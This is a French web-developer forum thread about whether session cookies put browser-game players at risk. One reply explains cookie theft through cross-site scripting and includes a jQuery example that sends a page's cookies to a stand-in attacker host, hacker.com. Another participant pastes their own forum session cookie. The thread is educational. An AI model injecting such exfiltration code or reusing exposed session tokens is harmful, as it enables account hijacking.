JeuWeb - Crée ton jeu par navigateur

Ah si, j'ai vu ça
ça n'est pas mieux que le joueur se connecte avec son login chaque fois qu'il veut jouer ?

Pourquoi serait-ce mieux ?

Pour éviter le vol du cookie du joueur par un autre joueur qui est en réseau dans la même salle ?

Tu priverais la grande majorité des utilisateurs pour la minorité qui utilise des ordinateurs publics ?

Dans ce cas il suffit de se déconnecter manuellement : les gens qui utilisent des ordinateurs publics se sensibilisent à ça d'eux même en tombant sur des choses appartenant à l'utilisateur précédent, il se disent qu'ils n'aimeraient pas que ça leur arrive.

Question qui a son importance : tu sais comment on vole un cookie ?


Sephi-Chan

bein non à ta question
Mais comme c'est dans l'ordi du joueur je suppose que ça doit être simple d'aller lire le fichier des cookies qui s'y situe ?
J'ai jamais essayé vu que ce que font les autres ne me regarde pas mais il vaut mieux prévenir son jeu de ce genre de choses peut-etre ?

Comment espères-tu prévenir un risque que tu ne comprends pas ?

Le vol de Cookie passe par Javascript. Sur un site, Javascript ne peut lire que les cookies écrits par ce site.

Essaye de mettre le code suivant dans la barre d'adresse de ton navigateur javascript: alert(cookies); et appuie sur Enter. Une boîte de dialogue contenant les cookies du site apparaîtront alors (sous forme d'une chaîne de caractères).

Le problème, c'est que si un utilisateur arrive à écrire du Javascript sur le site, il peut récupérer les cookies des utilisateurs. Petit exemple en supposant que le site sur lequel j'injecte du code utilise la librairie Javascript jQuery (parce que j'ai pas envie de m'emmerder à faire la requête Ajax à la main) :

<script type="text/javascript>

$(function(){

  $.ajax({

    url: "http://hacker.com/get_cookies",

    data: {

      website:       document.URL,

      cookie_string: cookies

    }

  });

});

</script>

Si j'arrive à injecter ce code sur une page Web (par exemple ce forum), toute personne qui visitera la page verra ses cookies envoyées sur le site spécifié. Donc je n'ai plus qu'à remplacer mon cookie d'authentification par le tiens pour usurper ton compte. Bien sûr, c'est plus intéressante si toi tu usurpes mon identité, puisque tu auras alors accès à l'administration du forum.

Heureusement, les messages sont échappés sur ce forum. Donc je ne peux pas injecter de code HTML dans ma réponse : les chevrons < et > sont remplacés par leurs entités HTML équivalents &lt; et &gt; donc le code Javascript n'est pas exécuté.


Sephi-Chan

jabandonne ce topic, bon courage "séphy".

internet explorer stocke les cookies dans un seul fichier (il me semble) et qui dit fichier dit possibilité de lecture non ?
Donc c'est à ça que je pensais, pas à l'insertion de javascript.
En tous cas, merci pour le mini-cours, c'est très instructif et interessant

Citation :Essaye de mettre le code suivant dans la barre d'adresse de ton navigateur javascript: alert(cookies);

ça m'envoie sur une page google sur le theme des cookies

EDIT :
pardon j'utilisais seulement "alert(cookies)" en oubliant "javascript :"

essaie ça:

javascript:alert(cookies);

oui ça m'affiche ça :

Citation :__utma=45402939.1736661581.1282957816.1284326021.1284328254.66; __utmz=45402939.1284321946.64.2.utmcsr=wiki.jeuweb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; mybbuser=1857_jUAfKZxLW4C7SFBrsnEGExpb1YAw1GnS1S862jYhiZWAYnkAOy; multiquote=; __utmc=45402939; __utmb=45402939.14.10.1284328254

Bien sûr j'y comprend rien

---

Heureusement que ce topic ne sert plus, car on est loin du sujet
m'enfin ça apprend des choses et ça c'est bien